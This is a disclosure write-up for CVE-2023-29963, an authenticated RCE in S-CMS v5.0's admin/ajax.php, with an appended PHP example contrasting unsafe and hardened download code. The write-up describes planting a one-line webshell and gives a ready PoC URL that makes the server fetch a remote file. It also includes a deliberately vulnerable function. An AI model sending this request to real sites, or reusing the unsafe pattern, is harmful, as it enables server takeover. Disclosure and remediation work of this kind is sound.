
CVE-2023-29963: debug/s-cms_rce.md at main · superjock1988/debug

S-CMS v5.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the component /admin/ajax.php.

CVE
#vulnerability#git#php#rce#auth

1. First download S-CMS Enterprise Website Building System v5.0 (the latest version at the time of writing).

2. Because the vulnerability is a command execution in the admin backend, it requires logging in with a backend administrator account. The vulnerable interface is http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=http://10.10.10.8:88/1.txt&id=1; request it directly to test.

3. After the request succeeds, a PHP file with a random name is generated in the Media directory. This file is our one-line webshell; visit it and execute commands.

4. Let's analyze the cause of the vulnerability. The vulnerable code is in the admin/ajax.php file. Re-request the vulnerable URL http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=http://10.10.10.8:88/1.txt&id=1, start debugging with PhpStorm, and set breakpoints at the following locations.

5. The fields in the SL_COMENT table are checked first. If data exists, execution continues downward.

6. All data in the SL_COMENT table is extracted, and then the code requests the URL we supplied (http://10.10.10.8:88/1.txt).

7. The result of that request is returned and assigned to a variable; the return value is then parsed, and we see the http://10.10.10.8:88/2.php link extracted from it.

8. The content of the 2.php file is then downloaded and read; follow the downpic function.

9. The .php suffix of 2.php is kept as the saved file's extension. The file name is built from the current time combined with a random 3-digit number. The content of 2.php is then written into the Media directory with file_put_contents.

10. Through the steps above, the webshell is written onto the system. We can execute arbitrary system commands by accessing that PHP file.

11. Two things are needed to exploit this vulnerability:

11.1. Create a text file whose data format is similar to that of the SL_Collection table, because the system will request the data in that format and extract the URL link in src, which is 2.php.

11.2. 2.php is a one-line webshell. Note that the file cannot be served from a PHP-executing environment, because the request needs to get the file's source back as the response, so I use Python to start an HTTP server.

![image](https://user-images.githubusercontent.com/113097106/227728467-f34ce272-5cce-46eb-82cd-fca1ea25d9ec.png)

12. Online POC link: http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=https://raw.githubusercontent.com/superjock1988/debug/main/1.txt&id=1. Only the local server IP address needs to be changed.
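The following is an added example, not code from S-CMS or from this write-up: a PHP reconstruction, based on the description in steps 8 to 10, of the unsafe "keep the remote file's own extension" pattern, next to a hardened version of the same download step. The function names downpic_unsafe, downpic_safe, url_extension and media_filename, the media directory path, and the sample URLs and bodies are assumptions made for illustration; the real downpic function in S-CMS is not reproduced here.

```php
<?php
// Added example: reconstruction of the unsafe "save the remote file with its
// own extension" pattern described in the write-up, next to a hardened form.
// This is NOT S-CMS source. Names (downpic_unsafe, downpic_safe, $mediaDir) and
// the sample inputs below are assumptions for illustration.

// Extension of the path component of a URL, lower-cased; '' if there is none.
function url_extension(string $url): string
{
    $path = parse_url($url, PHP_URL_PATH);
    if (!is_string($path)) {
        return '';
    }
    return strtolower(pathinfo($path, PATHINFO_EXTENSION));
}

// File name built the way the write-up describes: current time plus a random
// 3-digit number. The extension is supplied by the caller, which is the point.
function media_filename(string $ext): string
{
    return date('YmdHis') . random_int(100, 999) . '.' . $ext;
}

// Unsafe: whatever extension the remote URL ends with is kept, so a link to
// 2.php produces a .php file under the web root, executed on the next request.
function downpic_unsafe(string $url, string $body, string $mediaDir): string
{
    $name = media_filename(url_extension($url));
    file_put_contents($mediaDir . '/' . $name, $body);
    return $name;
}

// Hardened: the extension must come from an allow-list, and the bytes must
// parse as an image of the matching type. Returns null when the download is
// refused, so nothing is written for a rejected file.
function downpic_safe(string $url, string $body, string $mediaDir): ?string
{
    $allowed = [
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'png'  => 'image/png',
        'gif'  => 'image/gif',
    ];

    $ext = url_extension($url);
    if (!isset($allowed[$ext])) {
        return null;   // .php, .phtml, .phar, empty extension: all refused
    }

    // Check the content, not the URL: a PHP script fetched as "pic.gif" fails here.
    $info = @getimagesizefromstring($body);
    if ($info === false || ($info['mime'] ?? '') !== $allowed[$ext]) {
        return null;
    }

    $name = media_filename($ext);
    file_put_contents($mediaDir . '/' . $name, $body);
    return $name;
}

// --- demonstration with constructed inputs --------------------------------
$mediaDir = sys_get_temp_dir() . '/media_demo';   // assumed; not a real web root
if (!is_dir($mediaDir)) {
    mkdir($mediaDir, 0700, true);
}

$phpUrl  = 'http://10.10.10.8:88/2.php';          // the link extracted in step 7
$phpBody = "<?php echo 'not an image'; ?>";       // harmless stand-in for the script body
$gifUrl  = 'http://10.10.10.8:88/pic.gif';
$gifBody = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='); // 1x1 GIF

echo "unsafe: ", downpic_unsafe($phpUrl, $phpBody, $mediaDir), "\n";  // a .php file lands on disk
var_dump(downpic_safe($phpUrl, $phpBody, $mediaDir));                  // refused: extension
var_dump(downpic_safe($gifUrl, $phpBody, $mediaDir));                  // refused: body is not an image
echo "safe:   ", downpic_safe($gifUrl, $gifBody, $mediaDir), "\n";    // accepted: real GIF, .gif name
```

Run it with `php example.php`. The extension allow-list is the control that actually stops the RCE described here; the getimagesizefromstring check is defense in depth only, since a file that starts with a valid image header and carries PHP code afterwards still parses as an image. For the same reason the Media directory should also be configured so the web server never executes scripts from it.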
